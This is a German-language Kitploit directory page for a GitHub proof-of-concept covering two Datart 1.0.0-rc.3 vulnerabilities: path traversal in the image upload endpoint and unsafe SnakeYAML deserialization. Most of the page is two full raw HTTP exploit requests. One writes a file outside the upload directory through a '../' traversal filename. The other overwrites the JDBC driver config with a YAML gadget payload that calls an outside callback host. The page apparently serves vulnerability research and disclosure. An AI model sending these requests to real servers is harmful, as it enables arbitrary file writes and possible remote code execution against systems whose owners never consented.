Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-56815 — Datart 1.0.0-rc.3 ist anfällig für Verzeichnis-Traversal über die Schnittstelle POST /viz/image, da der Server direkt MultipartFile.transferTo() verwendet, um die hochgeladene Datei in einem vom Benutzer kontrollierbaren Pfad zu speichern, und es an einer strengen Überprüfung des Dateinamens mangelt. | Kitploit
Tools/GitHubGitHub/xiaoxiaoranxxx/cve-2025-56815
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsFehlkonfiguration
GitHubxiaoxiaoranxxx/cve-2025-56815

CVE-2025-56815

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

5vor 11 MonatenNoch nicht geprüft

Datart 1.0.0-rc.3 ist anfällig für Verzeichnis-Traversal über die Schnittstelle POST /viz/image, da der Server direkt MultipartFile.transferTo() verwendet, um die hochgeladene Datei in einem vom Benutzer kontrollierbaren Pfad zu speichern, und es an einer strengen Überprüfung des Dateinamens mangelt.

Teilen

CVE-2025-56815

Datart 1.0.0-rc.3 ist anfällig für Directory Traversal im POST /viz/image Interface, da der Server direkt MultipartFile.transferTo() verwendet, um die hochgeladene Datei in einem vom Benutzer kontrollierbaren Pfad zu speichern, und keine strenge Überprüfung des Dateinamens durchführt.

root@kitploit:~
POST /api/v1/files/viz/image?ownerType=DASHBOARD&ownerId=66822c13a9bc4381923456c11339497e&fileName=../../../../../../../../tmp/1 HTTP/1.1
Host: test.com
Accept-Language: zh-CN
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySInMdoLRiubl32BW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Length: 4646

------WebKitFormBoundarySInMdoLRiubl32BW
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type: image/jpeg

xxxxx
------WebKitFormBoundarySInMdoLRiubl32BW--

CVE-2025-56816

Datart 1.0.0-rc.3 ist anfällig für Directory Traversal. Die Verarbeitung von Konfigurationsdateien in der Anwendung erlaubt Angreifern, beliebige YAML-Dateien in den Pfad config/jdbc-driver-ext. yml hochzuladen. Die Anwendung parst diese Datei mit SnakeYAMLs unsicherer load()- oder loadAs()-Methode ohne Eingabebereinigung. Dies ermöglicht die Deserialisierung von Angreifer-kontrollierten YAML-Inhalten, was zur Instanziierung beliebiger Klassen führt. Unter bestimmten Bedingungen kann dies ausgenutzt werden, um Remote Code Execution (RCE) zu erreichen.

root@kitploit:~
POST /api/v1/files/viz/image?ownerType=DASHBOARD&ownerId=66822c13a9bc4381923456c11339497e&fileName=../../../../../config/jdbc-driver-ext.yml HTTP/1.1
Host: test.com
Accept-Language: zh-CN
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySInMdoLRiubl32BW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Length: 4646

------WebKitFormBoundarySInMdoLRiubl32BW
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type: image/jpeg

{!!java.net.URL ["http://test.eyes.sh/"]: 1}
------WebKitFormBoundarySInMdoLRiubl32BW--
Tool herunterladen